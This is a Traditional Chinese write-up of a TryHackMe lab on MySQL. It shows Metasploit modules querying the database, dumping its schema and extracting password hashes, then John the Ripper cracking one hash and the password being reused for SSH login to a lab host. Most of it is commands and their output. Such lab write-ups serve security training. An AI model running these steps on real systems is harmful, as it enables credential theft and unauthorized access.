TryHackMe Network Services 2 (MySQL) writeup (zh-TW)
說明: 這個房間演示如何枚舉和利用 MySQL 服務取得系統存取權限
📋 目標資訊
- Target IP:
10.201.5.x.x - 服務: MySQL
- 目標: 透過 MySQL 憑證重用取得系統存取權限
1. 憑證測試
題目提供測試憑證(模擬從其他服務取得):
- 使用者:
root - 密碼:
password
手動連線測試
mysql -h 10.201.5.209 -u root -p
# 輸入密碼: password
✅ 連線成功!確認憑證有效
mysql> exit
2. 使用 Metasploit mysql_sql 模組
啟動 Metasploit
msfconsole
設定模組
msf6 > search mysql_sql
msf6 > use auxiliary/admin/mysql/mysql_sql
msf6 auxiliary(admin/mysql/mysql_sql) > show options
需要設定的三個選項(降序):
PASSWORDRHOSTSUSERNAME
msf6 auxiliary(admin/mysql/mysql_sql) > set PASSWORD password
msf6 auxiliary(admin/mysql/mysql_sql) > set RHOSTS 10.201.5.209
msf6 auxiliary(admin/mysql/mysql_sql) > set USERNAME root
3. 執行 SQL 查詢
測試預設指令(查詢版本)
msf6 auxiliary(admin/mysql/mysql_sql) > run
結果:
[*] 10.201.5.209:3306 - | 8.0.42-0ubuntu0.20.04.1 |
MySQL 版本: 8.0.42-0ubuntu0.20.04.1
列出所有資料庫
msf6 auxiliary(admin/mysql/mysql_sql) > set SQL show databases
msf6 auxiliary(admin/mysql/mysql_sql) > run
結果: 共 4 個資料庫
information_schema
mysql
performance_schema
sys
4. 資料庫結構傾印(Schema Dump)
使用 mysql_schemadump 模組
msf6 > use auxiliary/scanner/mysql/mysql_schemadump
完整模組名稱: auxiliary/scanner/mysql/mysql_schemadump
設定選項並執行
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set USERNAME root
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set PASSWORD password
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set RHOSTS 10.201.5.209
msf6 auxiliary(scanner/mysql/mysql_schemadump) > run
最後一個被傾印的表格: x$waits_global_by_latency
5. 提取密碼雜湊
使用 mysql_hashdump 模組
msf6 > use auxiliary/scanner/mysql/mysql_hashdump
完整模組名稱: auxiliary/scanner/mysql/mysql_hashdump
設定選項並執行
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set PASSWORD password
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS 10.201.5.209
msf6 auxiliary(scanner/mysql/mysql_hashdump) > run
提取結果:
[+] root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] carl:*EA031893AA21444B170FC2162A56978B8CEECE18 ⬅️ 非預設使用者!
[+] debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
[+] mysql.infoschema:$A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[+] mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] root:
非預設使用者: carl
6. 破解密碼雜湊
儲存 hash 到檔案
echo "carl:*EA031893AA21444B170FC2162A56978B8CEECE18" > hash.txt
使用者/Hash 組合字串: carl:*EA031893AA21444B170FC2162A56978B8CEECE18
使用 John the Ripper 破解
john hash.txt
破解結果:
doggie (carl)
1g 0:00:00:00 DONE 3/3
✅ 成功破解密碼:doggie
7. 憑證重用攻擊
嘗試 SSH 登入
ssh [email protected]
# 密碼: doggie
✅ SSH 登入成功!
Welcome to Ubuntu 20.04.6 LTS
carl@ip-10-201-5-209:~$
8. 取得 Flag
carl@ip-10-201-5-209:~$ ls
MySQL.txt
carl@ip-10-201-5-209:~$ cat MySQL.txt
THM{Redacted}
技術要點總結
- ✅ MySQL Client - 手動連線測試
- ✅ Metasploit
mysql_sql- 執行 SQL 查詢 - ✅ Metasploit
mysql_schemadump- 資料庫結構傾印 - ✅ Metasploit
mysql_hashdump- 提取密碼雜湊 - ✅ John the Ripper - 破解 MySQL 密碼雜湊
- ✅ 憑證重用 - MySQL 密碼用於 SSH 登入
經驗分享
使用metasploit的時候,要搜尋可以利用search來搜尋相關的模組(modules),如:search mysql_hashdump
msf6 auxiliary(scanner/mysql/mysql_schemadump) > search mysql_hashdump
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_hashdump . normal No MYSQL Password Hashdump
1 auxiliary/analyze/crack_databases . normal No Password Cracker: Databases
2 \_ action: hashcat . . . Use Hashcat
3 \_ action: john . . . Use John the Ripper
Interact with a module by name or index. For example info 3, use 3 or use auxiliary/analyze/crack_databases
After interacting with a module you can manually set a ACTION with set ACTION 'john'要使用的話,可以用use如:use auxiliary/scanner/mysql/mysql_hashdump,
並利用options查詢用法,如下:
msf6 auxiliary(scanner/mysql/mysql_schemadump) > use auxiliary/scanner/mysql/mysql_hashdump
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(scanner/mysql/mysql_hashdump) > options
Module options (auxiliary/scanner/mysql/mysql_hashdump):
Used when connecting via an existing SESSION:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-meta
sploit.html
RPORT 3306 no The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no The username to authenticate as
View the full module info with the info, or info -d command.最後根據每個模組,設定相關參數,並滲透run
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS 10.201.5.209
RHOSTS => 10.201.5.209
msf6 auxiliary(scanner/mysql/mysql_hashdump) > run
[+] 10.201.5.209:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.201.5.209:3306 - Saving HashString as Loot: carl:*EA031893AA21444B170FC2162A56978B8CEECE18
[+] 10.201.5.209:3306 - Saving HashString as Loot: debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
[+] 10.201.5.209:3306 - Saving HashString as Loot: mysql.infoschema:$A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[+] 10.201.5.209:3306 - Saving HashString as Loot: mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.201.5.209:3306 - Saving HashString as Loot: mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.201.5.209:3306 - Saving HashString as Loot: root:
[*] 10.201.5.209:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Member discussion